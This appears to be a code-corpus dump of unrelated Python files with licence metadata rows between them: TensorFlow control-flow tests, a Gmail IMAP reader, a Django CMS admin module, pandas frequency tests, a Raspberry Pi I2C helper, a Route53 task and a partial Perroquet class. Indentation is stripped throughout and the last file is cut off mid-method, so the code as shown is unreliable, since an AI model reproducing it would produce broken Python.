tensor.append(constant_op.constant(1))
return i + tensor[0]
control_flow_ops.while_loop(lambda i: i < 10, body, [0])
return tensor[0]
def _getCondTensor(self):
cond_tensor = []
def true_fn():
if not cond_tensor:
cond_tensor.append(constant_op.constant(1))
return cond_tensor[0]
control_flow_ops.cond(
math_ops.less(1, 2), true_fn, lambda: constant_op.constant(0))
return cond_tensor[0]
def testInvalidContext(self):
# Accessing a while loop tensor outside of control flow is illegal.
while_tensor = self._getWhileTensor()
with self.assertRaisesRegexp(
ValueError,
"Cannot use 'while/Const_1' as input to 'Add' because 'while/Const_1' "
"is in a while loop. See info log for more details."):
math_ops.add(1, while_tensor)
def testInvalidContextInCond(self):
# Accessing a while loop tensor in cond is illegal.
while_tensor = self._getWhileTensor()
with self.assertRaisesRegexp(
ValueError, "Cannot use 'while/Const_1' as input to 'cond/Add' because "
"'while/Const_1' is in a while loop. See info log for more details."):
# TODO(skyewm): this passes if we return while_tensor directly instead
# of using it as input to another op.
control_flow_ops.cond(
math_ops.less(1, 2), lambda: math_ops.add(1, while_tensor),
lambda: constant_op.constant(0))
def testInvalidContextInWhile(self):
# Accessing a while loop tensor in a different while loop is illegal.
while_tensor = self._getWhileTensor()
with self.assertRaisesRegexp(
ValueError,
"Cannot use 'while_1/Add' as input to 'while/Const_1' because they are "
"in different while loops. See info log for more details."):
control_flow_ops.while_loop(lambda i: i < 10,
lambda x: math_ops.add(1, while_tensor), [0])
with self.assertRaisesRegexp(
ValueError,
"Cannot use 'while_2/NextIteration' as input to 'while/Const_1' "
"because they are in different while loops. See info log for more "
"details."):
control_flow_ops.while_loop(lambda i: i < 10, lambda i: while_tensor, [0])
def testValidCondContext(self):
# Accessing a tensor from a cond context is OK (although dangerous).
cond_tensor = self._getCondTensor()
math_ops.add(1, cond_tensor)
def testValidCondContextBranches(self):
# Accessing a tensor from a cond context from the other branch's cond
# context is OK (although dangerous).
cond_tensor = []
def branch_fn():
if not cond_tensor:
cond_tensor.append(constant_op.constant(1))
return cond_tensor[0]
control_flow_ops.cond(math_ops.less(1, 2), branch_fn, branch_fn)
def testValidWhileContext(self):
# Accessing a tensor in a nested while is OK.
def body(_):
c = constant_op.constant(1)
return control_flow_ops.while_loop(lambda i: i < 3, lambda i: i + c, [0])
control_flow_ops.while_loop(lambda i: i < 5, body, [0])
def testValidNestedContexts(self):
# Accessing a tensor from a cond context in a while context, all inside an
# outer while context, is OK.
def body(_):
cond_tensor = self._getCondTensor()
# Create another cond containing the while loop for good measure
return control_flow_ops.cond(
math_ops.less(1, 2),
lambda: control_flow_ops.while_loop(lambda i: i < 3,
lambda i: i + cond_tensor, [0]),
lambda: constant_op.constant(0))
control_flow_ops.while_loop(lambda i: i < 5, body, [0])
def testInvalidNestedContexts(self):
# Accessing a tensor from a while context in a different while context, all
# inside a cond context, is illegal.
def true_fn():
while_tensor = self._getWhileTensor()
return control_flow_ops.while_loop(lambda i: i < 3,
lambda i: i + while_tensor, [0])
with self.assertRaisesRegexp(
ValueError,
"Cannot use 'cond/while_1/add' as input to 'cond/while/Const_1' because"
" they are in different while loops. See info log for more details."):
control_flow_ops.cond(
math_ops.less(1, 2), true_fn, lambda: constant_op.constant(0))
class TupleTest(test.TestCase):
def testTensors(self):
for v1_first in [True, False]:
with self.cached_session():
v1 = variables.Variable([1.0])
add1 = math_ops.add(
control_flow_ops.with_dependencies([v1.initializer], v1._ref()), # pylint: disable=protected-access
2.0)
v2 = variables.Variable([10.0])
add2 = math_ops.add(
control_flow_ops.with_dependencies([v2.initializer], v2._ref()), # pylint: disable=protected-access
20.0)
t1, _, t2 = control_flow_ops.tuple([add1, None, add2])
# v1 is not initialized.
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v1.eval()
# v2 is not initialized.
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v2.eval()
if v1_first:
# Getting t1 initializes v2.
self.assertAllClose([3.0], t1.eval())
self.assertAllClose([10.0], v2.eval())
else:
# Getting t2 initializes v1.
self.assertAllClose([30.0], t2.eval())
self.assertAllClose([1.0], v1.eval())
def testIndexedSlices(self):
for v1_first in [True, False]:
with self.cached_session():
v1 = variables.Variable(
np.array([[0.0, 1.0], [10.0, 11.0], [20.0, 21.0]]).astype(
np.float32))
v1_at_1 = ops.IndexedSlices(
control_flow_ops.with_dependencies([v1.initializer], v1._ref()), # pylint: disable=protected-access
constant_op.constant([1]))
v2 = variables.Variable(
np.array([[0.1, 1.1], [10.1, 11.1], [20.1, 21.1]]).astype(
np.float32))
v2_at_1 = ops.IndexedSlices(
control_flow_ops.with_dependencies([v2.initializer], v2._ref()), # pylint: disable=protected-access
constant_op.constant([1]))
st1, st2 = control_flow_ops.tuple([v1_at_1, v2_at_1])
g1 = array_ops.gather(st1.values, st1.indices)
g2 = array_ops.gather(st2.values, st2.indices)
# v1 is not initialized.
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v1.eval()
# v2 is not initialized.
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v2.eval()
if v1_first:
# Getting g1 initializes v2.
self.assertAllClose([[10.0, 11.0]], g1.eval())
self.assertAllClose([[0.1, 1.1], [10.1, 11.1], [20.1, 21.1]],
v2.eval())
else:
# Getting g2 initializes v1.
self.assertAllClose([[10.1, 11.1]], g2.eval())
self.assertAllClose([[0.0, 1.0], [10.0, 11.0], [20.0, 21.0]],
v1.eval())
def testAcceptTensorsAsControlInputs(self):
with self.cached_session():
var = variables.Variable(0)
assign = state_ops.assign(var, 1)
t, = control_flow_ops.tuple(
[constant_op.constant(0)], control_inputs=[assign])
# Should trigger the assign.
t.eval()
self.assertEquals(1, var.eval())
class AssertTest(test.TestCase):
def testGuardedAssertDoesNotCopyWhenTrue(self):
with self.test_session(use_gpu=True) as sess:
with ops.device(test.gpu_device_name()):
value = constant_op.constant(1.0)
with ops.device("/cpu:0"):
true = constant_op.constant(True)
guarded_assert = control_flow_ops.Assert(true, [value], name="guarded")
unguarded_assert = gen_logging_ops._assert(
true, [value], name="unguarded")
opts = config_pb2.RunOptions(trace_level=config_pb2.RunOptions.FULL_TRACE)
guarded_metadata = config_pb2.RunMetadata()
sess.run(guarded_assert, options=opts, run_metadata=guarded_metadata)
unguarded_metadata = config_pb2.RunMetadata()
sess.run(unguarded_assert, options=opts, run_metadata=unguarded_metadata)
guarded_nodestat_names = [
n.node_name
for d in guarded_metadata.step_stats.dev_stats
for n in d.node_stats
]
unguarded_nodestat_names = [
n.node_name
for d in unguarded_metadata.step_stats.dev_stats
for n in d.node_stats
]
guarded_memcpy_nodestat_names = [
n for n in guarded_nodestat_names if "MEMCPYDtoH" in n
]
unguarded_memcpy_nodestat_names = [
n for n in unguarded_nodestat_names if "MEMCPYDtoH" in n
]
if "GPU" in [d.device_type for d in device_lib.list_local_devices()]:
# A copy was performed for the unguarded assert
self.assertLess(0, len(unguarded_memcpy_nodestat_names))
# No copy was performed for the guarded assert
self.assertEqual([], guarded_memcpy_nodestat_names)
class WhileOpBenchmark(test.Benchmark):
"""Evaluate the performance of while_loop op."""
def _getInitVariables(self):
batch_size = 10
image_size = 256
kernel_size = 3
depth = 16
init_step = constant_op.constant(-1)
image = variable_scope.get_variable(
"image",
initializer=random_ops.random_normal(
[batch_size, image_size, image_size, depth],
dtype=dtypes.float32,
stddev=1e-1))
kernel = variable_scope.get_variable(
"weights",
initializer=random_ops.truncated_normal(
[kernel_size, kernel_size, depth, depth],
dtype=dtypes.float32,
stddev=1e-1))
return init_step, image, kernel
def _runOneBenchmark(self,
default_device,
num_iters=10,
static_unroll=False,
steps=10):
"""Evaluate the while loop performance.
Args:
default_device: The default device to run all ops except the loop_body.
loop_body is always run on GPU.
num_iters: Number of iterations to run.
static_unroll: If true, run unrolled version; otherwise, run while_loop.
steps: Total number of repeated steps to run the loop.
Returns:
The duration of the run in seconds.
"""
def loop_body(i, x):
with ops.device("/gpu:0"):
# Always put loop body on GPU.
nx = nn_ops.conv2d(
input=x,
filter=kernel,
strides=[1, 1, 1, 1],
padding="SAME",
data_format="NHWC",
name="conv2d")
ni = math_ops.add(i, 1)
return ni, nx
ops.reset_default_graph()
with session.Session() as sess, ops.device(default_device):
# Get the initial id i, input x, and kernel.
i, x, kernel = self._getInitVariables()
sess.run(variables.global_variables_initializer())
if static_unroll:
for _ in xrange(steps):
i, x = loop_body(i, x)
else:
i, x = control_flow_ops.while_loop(
lambda i, _: i < steps,
loop_body, [i, x],
parallel_iterations=steps,
swap_memory=True)
r = math_ops.reduce_sum(x)
dx, dk = gradients_impl.gradients(r, [x, kernel])
# Use group to avoid fetching back results.
r = control_flow_ops.group(dx, dk)
for _ in xrange(3):
# exclude warm up time
sess.run(r)
start_time = time.time()
for _ in xrange(num_iters):
sess.run(r)
return (time.time() - start_time) / num_iters
def benchmarkWhileOpCrossDevicePlacement(self):
iters = 10
# Run loop body on GPU, but other ops on CPU.
duration = self._runOneBenchmark("cpu", iters, static_unroll=False)
self.report_benchmark(
name="while_op_cross_device", iters=iters, wall_time=duration)
def benchmarkWhileOpSameDevicePlacement(self):
iters = 10
# Run all ops on the same GPU device.
duration = self._runOneBenchmark("gpu", iters, static_unroll=False)
self.report_benchmark(
name="while_op_same_device", iters=iters, wall_time=duration)
def benchmarkWhileOpUnrollCrossDevicePlacement(self):
iters = 10
# Run loop body on GPU, but other ops on CPU.
duration = self._runOneBenchmark("cpu", iters, static_unroll=True)
self.report_benchmark(
name="unroll_cross_device_cpu", iters=iters, wall_time=duration)
def benchmarkWhileOpUnrollSameDevicePlacement(self):
iters = 10
# Run all ops on GPU.
duration = self._runOneBenchmark("gpu", iters, static_unroll=True)
self.report_benchmark(
name="unroll_same_device", iters=iters, wall_time=duration)
@test_util.with_cond_v2
class EagerTest(test.TestCase):
def testCond(self):
with context.eager_mode():
pred = math_ops.less(1, 2)
fn1 = lambda: [constant_op.constant(10)]
fn2 = lambda: [constant_op.constant(20)]
r = control_flow_ops.cond(pred, fn1, fn2)
self.assertAllEqual(r.numpy(), 10)
self.assertFalse(isinstance(r, list))
def testWhileLoop(self):
with context.eager_mode():
tensor = constant_op.constant([1, 2, 3, 4, 5])
self.assertAllEqual(isum(tensor).numpy(), [46, 47, 48, 49, 50])
def testWhileLoopWithMaxIterations(self):
with context.eager_mode():
tensor = constant_op.constant([1, 2, 3, 4, 5])
self.assertAllEqual(
isum(tensor, maximum_iterations=3).numpy(),
[1 + 3, 2 + 3, 3 + 3, 4 + 3, 5 + 3])
def testWhileWithMaximumIterationsAndSingleArgument(self):
with context.eager_mode():
tensor = constant_op.constant(0)
r = control_flow_ops.while_loop(
lambda i: i < 3, lambda i: i + 1, [tensor], maximum_iterations=1)
self.assertEqual(1, r.numpy())
def testWithDependencies(self):
with context.eager_mode():
t1 = constant_op.constant(1)
t2 = constant_op.constant(2)
t3 = control_flow_ops.with_dependencies(t1, t2)
self.assertAllEqual(t2.numpy(), t3.numpy())
def testTuple(self):
with context.eager_mode():
t1 = constant_op.constant(1)
t2 = constant_op.constant(2)
tup1, tup2 = control_flow_ops.tuple([t1, t2])
self.assertAllEqual(t1.numpy(), tup1.numpy())
self.assertAllEqual(t2.numpy(), tup2.numpy())
def testCase(self):
with context.eager_mode():
x = constant_op.constant(1)
y = constant_op.constant(2)
z = constant_op.constant(3)
f1 = lambda: constant_op.constant(17)
f2 = lambda: constant_op.constant(23)
f3 = lambda: constant_op.constant(-1)
r1 = control_flow_ops.case(
[(x < y, f1), (x > z, f2)], default=f3, exclusive=True)
self.assertAllEqual(r1.numpy(), 17)
if __name__ == "__main__":
test.main()
| apache-2.0 | 5,589,263,064,231,256,000 | 34.988483 | 112 | 0.609403 | false |
AstroTech/workshop-python | network/src/imap-gmail.py | 1 | 1379 | import getpass
import imaplib
import email
from pprint import pprint
from quopri import decodestring
from datetime import datetime
USERNAME = getpass.getuser()
PASSWORD = getpass.getpass()
HOST = 'imap.gmail.com'
PORT = 993
imap = imaplib.IMAP4_SSL(HOST, PORT)
imap.login(USERNAME, PASSWORD)
imap.select('INBOX')
def get_str(text):
return decodestring(text).decode()
def get_date(text):
try:
return datetime.strptime(headers['Date'], '%a, %d %b %Y %H:%M:%S %z')
except ValueError:
return text
def get_body(msg):
type = msg.get_content_maintype()
if type == 'multipart':
for part in msg.get_payload():
if part.get_content_maintype() == 'text':
return part.get_payload(decode=True).decode('utf-8')
elif type == 'text':
return msg.get_payload(decode=True).decode('utf-8')
status, data = imap.search(None, 'ALL')
# status: OK
# data: [b'1 2 3 4 ...']
for num in data[0].split():
status, data = imap.fetch(num, '(RFC822)')
mail = email.message_from_string(data[0][1].decode())
headers = dict(mail._headers)
mail = {
'to': get_str(headers['To']),
'sender': get_str(headers['From']),
'subject': get_str(headers['Subject']),
'date': get_date(headers['Date']),
'body': get_body(mail)
}
pprint(mail)
imap.close()
imap.logout()
| mit | 7,039,509,036,235,123,000 | 22.372881 | 77 | 0.618564 | false |
uhuramedia/Havel | HavelCMS/admin.py | 1 | 7900 | import datetime
from django.conf import settings
from django.contrib import admin
from django.contrib.admin.options import FORMFIELD_FOR_DBFIELD_DEFAULTS
from django.core import urlresolvers
from django.db import models
from django.utils.importlib import import_module
from django.utils.translation import ugettext_lazy as _
from feincms.admin.tree_editor import TreeEditor as _feincms_tree_editor
from mptt.admin import MPTTModelAdmin
from mptt.forms import MPTTAdminForm, TreeNodeChoiceField
from HavelCMS.models import ResourceProperty, Page, Weblink, Resource, \
ResourceTranslation, ResourceCollection, ResourceCollectionItem, File
from contrib.attachments.admin import FileLinkInline, LinkInline
def get_class_from_string(str):
path = str
i = path.rfind('.')
module, attr = path[:i], path[i + 1:]
try:
mod = import_module(module)
return getattr(mod, attr)
except ImportError, e:
raise ImproperlyConfigured('Error importing module %s: "%s"' % (module, e))
class ResourcePropertyInline(admin.TabularInline):
model = ResourceProperty
extra = 0
class FeinCMSModelAdmin(_feincms_tree_editor):
"""
A ModelAdmin to add changelist tree view and editing capabilities.
Requires FeinCMS to be installed.
"""
form = MPTTAdminForm
def _actions_column(self, obj):
actions = super(FeinCMSModelAdmin, self)._actions_column(obj)
actions.insert(0,
u'<a href="%s?%s=%s" title="%s">%s</a>' % (
urlresolvers.reverse('admin:HavelCMS_page_add'),
self.model._mptt_meta.parent_attr,
obj.pk,
_('+Page'),
_('+Page')))
actions.insert(0,
u'<a href="%s?%s=%s" title="%s">%s</a>' % (
urlresolvers.reverse('admin:HavelCMS_weblink_add'),
self.model._mptt_meta.parent_attr,
obj.pk,
_('+Weblink'),
_('+Weblink')))
return actions
def delete_selected_tree(self, modeladmin, request, queryset):
"""
Deletes multiple instances and makes sure the MPTT fields get recalculated properly.
(Because merely doing a bulk delete doesn't trigger the post_delete hooks.)
"""
n = 0
for obj in queryset:
obj.delete()
n += 1
self.message_user(request, _("Successfully deleted %s items.") % n)
def get_actions(self, request):
actions = super(FeinCMSModelAdmin, self).get_actions(request)
if 'delete_selected' in actions:
actions['delete_selected'] = (self.delete_selected_tree, 'delete_selected', _("Delete selected %(verbose_name_plural)s"))
return actions
def page_or_else(resource, code):
v = resource.get_translated_version(code)
if v is None:
return "-"
return v
class ResourceAdmin(FeinCMSModelAdmin):
list_display = ('__unicode__',
'title_link',
'is_published',
'in_menu',
'translation_pool',
'language',
'author')
list_filter = ('is_published', 'in_menu', 'author', 'language')
search_fields = ('title',)
inlines = (ResourcePropertyInline,)
actions = ('make_published', 'make_unpublished', 'link')
prepopulated_fields = {'slug': ('title',)}
ordering = ['tree_id', 'lft']
def __init__(self, *args, **kwargs):
super(ResourceAdmin, self).__init__(*args, **kwargs)
self.list_display_links = (None,)
def has_add_permission(self, request, obj=None):
return False
def title_link(self, obj):
return u'<a href="%s">%s</a>' % (obj.get_edit_link(),
obj.content_type)
title_link.allow_tags = True
title_link.short_description = _("Edit")
def make_do(self, request, queryset, label, *args, **make):
rows_updated = queryset.update(**make)
if rows_updated == 1:
message_bit = _("1 resource was")
else:
message_bit = _("%s resources were" % rows_updated)
self.message_user(request, _("%(num)s successfully %(action)s." % {'num': message_bit, 'action': label}))
def make_published(self, request, queryset):
return self.make_do(request, queryset, _("marked as published"),
is_published=True, published=datetime.datetime.now())
make_published.short_description = _("Mark selected resources as published")
def make_unpublished(self, request, queryset):
return self.make_do(request, queryset, _("marked as unpublished"),
is_published=False, published=None)
make_unpublished.short_description = _("Mark selected resources as unpublished")
def link(self, request, queryset):
rt = ResourceTranslation.objects.create()
for obj in queryset:
obj.translation_pool = rt
obj.save()
link.short_description = _("Link these resources as translation")
admin.site.register(Resource, ResourceAdmin)
class PageAdmin(FeinCMSModelAdmin):
list_display = ('mptt_title',
'is_published',
'in_menu',
'slug',
'language',
'author')
ordering = ('tree_id', 'lft')
list_filter = ('is_published', 'in_menu', 'author', 'language')
inlines = (ResourcePropertyInline, LinkInline, FileLinkInline)
prepopulated_fields = {'slug': ('title',)}
fieldsets = (
(None, {
'fields': ('parent', ('title', 'slug'), 'language', 'text', 'template')
}),
('Settings', {
'fields': ('in_menu', 'is_published', 'show_title')
}),
('Timing', {
'classes': ('collapse',),
'fields': ('published', 'unpublished')
}),
('Other', {
'classes': ('collapse',),
'fields': ('menu_title', 'meta_summary', 'noindex')
}),
)
def __init__(self, *args, **kwargs):
super(PageAdmin, self).__init__(*args, **kwargs)
setting = "RESOURCES_%s_TEXTWIDGET" % self.model._meta.model_name.upper()
if hasattr(settings, setting):
self.formfield_overrides = {
models.TextField: {'widget': get_class_from_string(getattr(settings, setting)) }
}
overrides = FORMFIELD_FOR_DBFIELD_DEFAULTS.copy()
overrides.update(self.formfield_overrides)
self.formfield_overrides = overrides
setting = "RESOURCES_%s_INLINES" % self.model._meta.model_name.upper()
if hasattr(settings, setting):
self.inlines = list(self.inlines)
for i in getattr(settings, setting):
self.inlines.append(get_class_from_string(i))
def save_model(self, request, obj, form, change):
if getattr(obj, 'author', None) is None:
obj.author = request.user
obj.save()
admin.site.register(Page, PageAdmin)
class WeblinkAdmin(ResourceAdmin):
def __init__(self, *args, **kwargs):
super(WeblinkAdmin, self).__init__(*args, **kwargs)
setting = "RESOURCES_%s_INLINES" % self.model._meta.model_name.upper()
if hasattr(settings, setting):
self.inlines = list(self.inlines)
for i in getattr(settings, setting):
self.inlines.append(get_class_from_string(i))
def has_add_permission(self, request, obj=None):
return True
admin.site.register(Weblink, WeblinkAdmin)
class ResourceCollectionItemInline(admin.TabularInline):
model = ResourceCollectionItem
class ResourceCollectionAdmin(admin.ModelAdmin):
inlines = (ResourceCollectionItemInline,)
admin.site.register(ResourceCollection, ResourceCollectionAdmin)
admin.site.register(File)
| bsd-3-clause | -1,609,924,798,894,494,700 | 34.426009 | 133 | 0.599114 | false |
lecovi/reveal.js | archivos/encapsulamiento_property.py | 1 | 1041 | class Encapsulamiento:
""" Esta clase tiene 3 atributos y 3 métodos propios.
>>> # El atributo privado es accesible a través de una Propiedad.
>>> x = Encapsulamiento()
>>> x.atributo_publico
este atributo es privado.
>>> x._atributo_semi_privado
este atributo es 'casi' privado.
>>> x.atributo_privado
este atributo es privado.
"""
def __init__(self):
self.__atributo_privado = "este atributo es privado."
self._atributo_semi_privado = "este atributo es 'casi' privado."
self.atributo_publico = "este atributo es público."
def publico(self):
return "Este es un método Público"
def _semi_privado(self):
return "Este es un método Semi Privado"
def __privado(self):
return "Este es un método Privado"
@property
def atributo_privado(self):
return self.__atributo_privado
@atributo_privado.setter
def atributo_privado(self, valor):
self.__atributo_privado = valor
| mit | -8,376,594,411,097,522,000 | 30.333333 | 73 | 0.619923 | false |
pashinin-com/pashinin.com | src/ege/migrations/0006_auto_20170217_1608.py | 1 | 1323 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-02-17 13:08
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('edu', '0007_auto_20170217_1434'),
('ege', '0005_auto_20170129_0117'),
]
operations = [
migrations.CreateModel(
name='Task',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type', models.IntegerField(choices=[(0, '1 единственная задача'), (1, '1 задача из N на выбор')], default=0, verbose_name='Нужно решить')),
('order', models.IntegerField(verbose_name='Номер задачи в экзамене, например от 1 до 27')),
('tags', models.ManyToManyField(help_text='Все тэги, которые подходят для этой задачи в этом экзамене', related_name='ege_tasks', to='edu.Category', verbose_name='Tags')),
],
),
migrations.AddField(
model_name='ege',
name='tasks',
field=models.ManyToManyField(blank=True, related_name='exams', to='ege.Task'),
),
]
| gpl-3.0 | 364,146,395,202,600,960 | 38.966667 | 187 | 0.593828 | false |
MJuddBooth/pandas | pandas/tests/tseries/frequencies/test_freq_code.py | 1 | 4707 | import pytest
from pandas._libs.tslibs import frequencies as libfrequencies, resolution
from pandas._libs.tslibs.frequencies import (
FreqGroup, _period_code_map, get_freq, get_freq_code)
import pandas.compat as compat
import pandas.tseries.offsets as offsets
@pytest.fixture(params=list(compat.iteritems(_period_code_map)))
def period_code_item(request):
return request.param
@pytest.mark.parametrize("freqstr,expected", [
("A", 1000), ("3A", 1000), ("-1A", 1000),
("Y", 1000), ("3Y", 1000), ("-1Y", 1000),
("W", 4000), ("W-MON", 4001), ("W-FRI", 4005)
])
def test_freq_code(freqstr, expected):
assert get_freq(freqstr) == expected
def test_freq_code_match(period_code_item):
freqstr, code = period_code_item
assert get_freq(freqstr) == code
@pytest.mark.parametrize("freqstr,expected", [
("A", 1000), ("3A", 1000), ("-1A", 1000), ("A-JAN", 1000),
("A-MAY", 1000), ("Y", 1000), ("3Y", 1000), ("-1Y", 1000),
("Y-JAN", 1000), ("Y-MAY", 1000), (offsets.YearEnd(), 1000),
(offsets.YearEnd(month=1), 1000), (offsets.YearEnd(month=5), 1000),
("W", 4000), ("W-MON", 4000), ("W-FRI", 4000), (offsets.Week(), 4000),
(offsets.Week(weekday=1), 4000), (offsets.Week(weekday=5), 4000),
("T", FreqGroup.FR_MIN),
])
def test_freq_group(freqstr, expected):
assert resolution.get_freq_group(freqstr) == expected
def test_freq_group_match(period_code_item):
freqstr, code = period_code_item
str_group = resolution.get_freq_group(freqstr)
code_group = resolution.get_freq_group(code)
assert str_group == code_group == code // 1000 * 1000
@pytest.mark.parametrize("freqstr,exp_freqstr", [
("D", "D"), ("W", "D"), ("M", "D"),
("S", "S"), ("T", "S"), ("H", "S")
])
def test_get_to_timestamp_base(freqstr, exp_freqstr):
tsb = libfrequencies.get_to_timestamp_base
assert tsb(get_freq_code(freqstr)[0]) == get_freq_code(exp_freqstr)[0]
_reso = resolution.Resolution
@pytest.mark.parametrize("freqstr,expected", [
("A", "year"), ("Q", "quarter"), ("M", "month"),
("D", "day"), ("H", "hour"), ("T", "minute"),
("S", "second"), ("L", "millisecond"),
("U", "microsecond"), ("N", "nanosecond")
])
def test_get_str_from_freq(freqstr, expected):
assert _reso.get_str_from_freq(freqstr) == expected
@pytest.mark.parametrize("freq", ["A", "Q", "M", "D", "H",
"T", "S", "L", "U", "N"])
def test_get_freq_roundtrip(freq):
result = _reso.get_freq(_reso.get_str_from_freq(freq))
assert freq == result
@pytest.mark.parametrize("freq", ["D", "H", "T", "S", "L", "U"])
def test_get_freq_roundtrip2(freq):
result = _reso.get_freq(_reso.get_str(_reso.get_reso_from_freq(freq)))
assert freq == result
@pytest.mark.parametrize("args,expected", [
((1.5, "T"), (90, "S")), ((62.4, "T"), (3744, "S")),
((1.04, "H"), (3744, "S")), ((1, "D"), (1, "D")),
((0.342931, "H"), (1234551600, "U")), ((1.2345, "D"), (106660800, "L"))
])
def test_resolution_bumping(args, expected):
# see gh-14378
assert _reso.get_stride_from_decimal(*args) == expected
@pytest.mark.parametrize("args", [
(0.5, "N"),
# Too much precision in the input can prevent.
(0.3429324798798269273987982, "H")
])
def test_cat(args):
msg = "Could not convert to integer offset at any resolution"
with pytest.raises(ValueError, match=msg):
_reso.get_stride_from_decimal(*args)
@pytest.mark.parametrize("freq_input,expected", [
# Frequency string.
("A", (get_freq("A"), 1)),
("3D", (get_freq("D"), 3)),
("-2M", (get_freq("M"), -2)),
# Tuple.
(("D", 1), (get_freq("D"), 1)),
(("A", 3), (get_freq("A"), 3)),
(("M", -2), (get_freq("M"), -2)),
((5, "T"), (FreqGroup.FR_MIN, 5)),
# Numeric Tuple.
((1000, 1), (1000, 1)),
# Offsets.
(offsets.Day(), (get_freq("D"), 1)),
(offsets.Day(3), (get_freq("D"), 3)),
(offsets.Day(-2), (get_freq("D"), -2)),
(offsets.MonthEnd(), (get_freq("M"), 1)),
(offsets.MonthEnd(3), (get_freq("M"), 3)),
(offsets.MonthEnd(-2), (get_freq("M"), -2)),
(offsets.Week(), (get_freq("W"), 1)),
(offsets.Week(3), (get_freq("W"), 3)),
(offsets.Week(-2), (get_freq("W"), -2)),
(offsets.Hour(), (FreqGroup.FR_HR, 1)),
# Monday is weekday=0.
(offsets.Week(weekday=1), (get_freq("W-TUE"), 1)),
(offsets.Week(3, weekday=0), (get_freq("W-MON"), 3)),
(offsets.Week(-2, weekday=4), (get_freq("W-FRI"), -2)),
])
def test_get_freq_code(freq_input, expected):
assert get_freq_code(freq_input) == expected
def test_get_code_invalid():
with pytest.raises(ValueError, match="Invalid frequency"):
get_freq_code((5, "baz"))
| bsd-3-clause | -5,491,830,421,126,756,000 | 30.590604 | 75 | 0.579137 | false |
tweakyllama/Arduino-Projects | I2C/src/raspberry.py | 1 | 1938 | import time
import smbus
class I2C(object):
@staticmethod
def getPiVersion():
"Gets the version number of the Pi board"
try:
with open('/proc/cpuinfo', 'r') as infile:
for line in infile:
# Match a line of the form "Revision : 0002" while ignoring extra
# info in front of the revsion (like 1000 when the Pi was over-volted).
match = re.match('Revision\s+:\s+.*(\w{4})$', line)
if match and match.group(1) in ['0000', '0002', '0003']:
# Return revision 1 if revision ends with 0000, 0002 or 0003.
return 1
elif match:
# Assume revision 2 if revision ends with any other 4 chars.
return 2
return 0
except:
return 0
@staticmethod
def getI2CBusNumber():
return 1 if I2C.getPiVersion() > 1 else 0
def __init__(self, address, busnum = -1, debug = False):
self.address = address
# By default, the correct I2C bus is auto-detected using /proc/cpuinfo
# Alternatively, you can hard-code the bus version below:
# self.bus = smbus.SMBus(0); # Force I2C0 (early 256MB Pi's)
# self.bus = smbus.SMBus(1); # Force I2C1 (512MB Pi's)
self.bus = smbus.SMBus(busnum if busnum >= 0 else Adafruit_I2C.getPiI2CBusNumber())
self.debug = debug
def reverseByteOrder(self, data):
"Reverses the byte order of an int (16-bit) or a long (32-bit)"
# Courtesy Vishal Sapre
byteCount = len(hex(data)[2:].replace('L','')[::2])
val = 0
for i in range(byteCount):
val = (val << 8) | (data & 0xff)
data >>= 8
return val
def errMsg(self):
print "Error accessing 0x%02X: Check your I2C address" % self.address
return -1
def write8(self, reg, value):
"Writes an 8-bit value to specified register/address"
try:
self.bus.write_byte_data(self.address, reg, value)
except IOError, err:
return self.errMsg()
| gpl-2.0 | 7,011,148,986,396,381,000 | 32.413793 | 87 | 0.615067 | false |
joshbuddy/crew | pitcrew/tasks/ensure/aws/route53/has_records.py | 1 | 1339 | import json
import asyncio
from pitcrew import task
@task.arg("zone_id", desc="The zone id to operate on", type=str)
@task.arg("records", desc="A list of records to ensure are set", type=list)
class HasRecords(task.BaseTask):
"""Ensure route53 has the set of records"""
async def verify(self):
json_out = await self.sh(
f"aws route53 list-resource-record-sets --hosted-zone-id {self.params.esc_zone_id}"
)
out = json.loads(json_out)
existing_record_sets = out["ResourceRecordSets"]
for record in self.params.records:
assert record in existing_record_sets, "cannot find record"
async def run(self):
changes = map(
lambda c: {"Action": "UPSERT", "ResourceRecordSet": c}, self.params.records
)
change_batch = {"Changes": list(changes)}
change_id = json.loads(
await self.sh(
f"aws route53 change-resource-record-sets --hosted-zone-id {self.params.esc_zone_id} --change-batch {self.esc(json.dumps(change_batch))}"
)
)["ChangeInfo"]["Id"]
while (
json.loads(
await self.sh(f"aws route53 get-change --id {self.esc(change_id)}")
)["ChangeInfo"]["Status"]
== "PENDING"
):
await asyncio.sleep(5)
| mit | 3,340,604,327,670,191,000 | 36.194444 | 153 | 0.589246 | false |
niavok/perroquet | perroquetlib/repository/exercise_repository_exercise.py | 1 | 15308 | #! /usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2009-2011 Frédéric Bertolus.
# Copyright (C) 2009-2011 Matthieu Bizien.
#
# This file is part of Perroquet.
#
# Perroquet is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Perroquet is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Perroquet. If not, see <http://www.gnu.org/licenses/>.
import errno
import gettext
import logging
import os
import tarfile
import tempfile
import thread
import urllib2
from threading import Lock
from xml.dom.minidom import getDOMImplementation, parse
from perroquetlib.debug import defaultLoggingHandler, defaultLoggingLevel
_ = gettext.gettext
class ExerciseRepositoryExercise:
def __init__(self):
self.id = "no-id"
self.name = "No name"
self.description = ""
self.mutexInstalling = Lock()
self.downloadPercent = 0
self.state = "none"
self.wordsCount = 0
self.translationList = []
self.version = None
self.logger = logging.Logger("ExerciseRepositoryExercise")
self.logger.setLevel(defaultLoggingLevel)
self.logger.addHandler(defaultLoggingHandler)
self.licence = _("Not specified")
self.author = _("Not specified")
self.authorWebsite = _("Not specified")
self.authorContact = _("Not specified")
self.packager = _("Not specified")
self.packagerWebsite = _("Not specified")
self.packagerContact = _("Not specified")
self.language = _("Not specified")
self.mediaType = _("Not specified")
self.filePath = _("Not specified")
self.system = False
def set_system(self, system):
